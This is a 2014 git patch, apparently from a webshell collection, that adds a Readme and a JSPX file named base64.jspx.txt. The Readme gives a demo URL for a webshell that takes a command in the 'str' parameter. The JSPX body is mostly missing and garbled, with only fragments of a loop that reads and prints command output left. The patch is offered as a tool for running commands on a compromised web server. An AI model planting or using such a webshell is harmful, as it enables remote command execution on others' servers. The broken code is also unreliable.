From b1eac144900f4b62f425195fb344c4cfd32f61ff Mon Sep 17 00:00:00 2001 From: tennc Date: Tue, 5 Aug 2014 16:17:54 +0800 Subject: [PATCH] update ebase64.jspx --- jspx/Ends/Readme.md | 3 +++ jspx/Ends/base64.jspx.txt | 24 ++++++++++++++++++++++++ 2 files changed, 27 insertions(+) create mode 100644 jspx/Ends/Readme.md create mode 100644 jspx/Ends/base64.jspx.txt diff --git a/jspx/Ends/Readme.md b/jspx/Ends/Readme.md new file mode 100644 index 0000000..5aeb989 --- /dev/null +++ b/jspx/Ends/Readme.md @@ -0,0 +1,3 @@ +Author:Ends +site:http://ends.cc/?paged=5 +'demo:http://ends.cc/webshell/base64.jspx?str=cmd' \ No newline at end of file diff --git a/jspx/Ends/base64.jspx.txt b/jspx/Ends/base64.jspx.txt new file mode 100644 index 0000000..844b3cc --- /dev/null +++ b/jspx/Ends/base64.jspx.txt @@ -0,0 +1,24 @@ + + + + + +"); + brs = br.readLine(); + } + }catch(Exception ex){ + out.println(ex.toString()); + } + }]]> + + \ No newline at end of file